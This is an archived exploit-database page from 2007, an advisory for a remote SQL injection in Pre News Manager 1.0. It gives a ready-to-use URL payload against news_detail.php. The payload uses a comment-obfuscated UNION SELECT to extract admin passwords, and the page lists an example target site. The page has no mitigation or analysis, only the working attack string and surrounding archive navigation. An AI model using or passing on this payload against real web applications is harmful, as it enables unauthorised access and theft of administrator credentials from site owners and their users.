[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pre News Manager 1.0 Remote SQL Injection Vulnerability
# Published : 2007-05-03
# Author : xoron
# Previous Title : MiniGal b13 (image backdoor) Remote Code Execution Exploit
# Next Title : Pre Shopping Mall 1.0 Remote SQL Injection Vulnerability
==============================================
Pre News Manager v1.0 Remote SQL Injection
==============================================
Found: Cyber-Security.org
==============================================
Script site: http://www.preproject.com/news.asp
==============================================
Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*
==============================================
Example: http://www.preproject.com/news%20manager/
==============================================
# www.Syue.com [2007-05-03]